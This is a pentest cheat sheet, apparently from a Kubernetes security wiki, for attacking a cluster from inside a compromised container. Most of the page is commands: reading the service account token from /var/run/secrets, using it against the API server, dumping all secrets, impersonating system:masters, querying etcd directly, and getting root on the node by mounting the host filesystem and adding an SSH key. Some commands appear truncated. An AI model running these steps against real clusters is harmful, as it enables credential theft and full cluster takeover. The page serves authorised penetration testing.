Skip to content

Compromised Container

Access to Container

NCC Attack Chain / Pentest process

In addition to this page, review: Deep Dive into Real-World Kubernetes Threats

Install custom tools (and prove Internet access)
  • curl -sLO
  • chmod +x kubectl
  • mv kubectl /bin
Obtain the default ServiceAccount token
  • ls /var/run/secrets/
    ca.pem namespace token
  • TOKEN=$(cat /var/run/secrets/
  • CACERT=/var/run/secrets/
  • NAMESPACE=$(cat /var/run/secrets/
Find API server IP and interact with curl
  • env | grep KUBE
  • K8S=https://$K8S_HOST:$K8S_PORT/api/v1/namespaces/
  • curl -H "Authorization: Bearer $TOKEN" --cacert $CACERT $K8S/healthz
Interact with kubectl
  • kubectl --token=<TOKEN> get nodes --all-namespaces
Obtain all secrets
  • Obtain Service Account Token
    • $ read TOKEN < <(kubectl -n default describe secrets $(kubectl -n default get secrets | awk '/SANAME/ {print $1}') | awk '/token:/ {print $2}')
  • Obtain master IP
    • $ kubectl cluster-info
      Kubernetes master is running at MASTER-IP:8443
  • Check that TOKEN can list secrets in default namespace
    • $ curl -k -v -H "Authorization: Bearer <jwt_token>" -H "Content-Type: application/json" https://<master_ip>:6443/api/v1/namespaces/default/secrets | jq -r '.items[].data'
Impersonate privileged account
  • kubectl get secrets --as=null --as-group=system:masters


Direct Dashboard Access curl -s http://kubernetes-dashboard.kube-system
Direct APIs Access
  • kubectl get --raw=/api | jq .serverAddressByClientCIDRs[0].serverAddress -r
  • curl -s
Access the Kubelet API (kubelet-exploit) See Kubelet Exploit


Port Scan See Network page
Access Other Services Inside the Cluster Directly redis-cli -h redis-master.default


Direct ETCD Access (and obtain root on underlying node)
  1. Obtain Kubelet or higher SA Token
  2. Schedule a Pod & mount the host filesystem
  3. Add SSH Key
  4. SSH Into Node
$ curl -s http://<kuberenets-IP>:2379/v2/keys/?recursive=true
Direct ETCD Access (review the content)
  1. Obtain a copy of etcdctl
  2. Query the API
  3. Review/dump the content
$ curl -sLO
# Query the API - v2 (K8s <= 1.5)
#    And explore the config
#    /registry/secrets/default may contain the default service token
$ etcdctl --endpoint=http://[etcd_server_ip]:2379 ls

# Query the API - v3
#   Dump an instance of the etcd database to a file on disk
#   Read the file with:
$ export ETCDCTL_API=3 
$ etcdctl snapshot